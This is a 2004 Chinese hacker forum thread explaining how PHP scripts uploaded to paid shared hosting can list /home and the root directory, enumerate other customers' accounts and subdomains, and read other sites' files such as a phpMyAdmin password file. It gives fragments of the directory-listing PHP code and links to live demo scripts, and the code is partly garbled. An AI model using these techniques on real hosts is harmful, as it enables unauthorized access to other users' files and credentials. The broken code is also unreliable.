标题: PHP收费空间的一点小漏洞 [打印本页]

---

作者: blackking    时间: 2004-8-14 15:14     标题: PHP收费空间的一点小漏洞

编者：其实我从别的网站上看到这个文章的时候，不是现在这个名字，　叫一点经验． 不好意思，作者，其实我是为了引起更多朋友对这篇文章的关注． 可惜不知道作者是谁．．．．．． 大多数(能执行PHP的)收费空间都有此问题 以下以虎翼为例: 代码： handle."
\n"; echo "Path:".$d->path."
\n"; while($entry=$d->read()) { echo $entry."
\n"; } $d->close(); ?> 利用此test.php程序可以查看/home下所有文件，可以查看51.net的当前主机的全部用户 把"/home"改成"/"可以看到什么?你自己去看吧.别太紧张.紧张的在后面 HOME下的全是登陆帐号 HOME/.domain和 HOME/.trialdomain 下的全是三级域名 帐号里有很多都没空间，是空号。我反复试了。 三级域名是对应·A型虚拟主机的 例子(没敢用虎翼的) http://tonylong.l1h.net/test.php http://tonylong.l1h.net/test1.php http://tonylong.l1h.net/test2.php http://tonylong.l1h.net/test3.php 用aa.php读取文件原码 读取。。 例子读取:/home/html/phpmyadmin/user_password.php的原码（这对网站威胁很大）http://tonylong.l1h.net/aa.php 用ss.php查询指定文件目录下的所有文件和文件夹 "; $handle=opendir($dir); echo "directory Handle:$handle
\n"; while ($sdir=readdir($handle)){ if(is_file("$dir/$sdir")) echo "

$dir/$sdir"; if(is_dir("$dir/$sdir") and $sdir<>'.' and $sdir<>'..'){ echo "

$dir"; listdir("$dir/$sdir"); } } closedir($handle); echo ""; } if(!empty($dir)){ listdir($dir); } ?>

请输入查询路径：

例子http://tonylong.l1h.net/ss.php 以上演示空间是l1h.net的免费空间 大家别攻击

---

作者: blackking    时间: 2004-8-14 15:18     标题: PHP收费空间的一点小漏洞

我可能知道你是用的那个了~ 哈哈！

---

欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)

Powered by Discuz! 7.2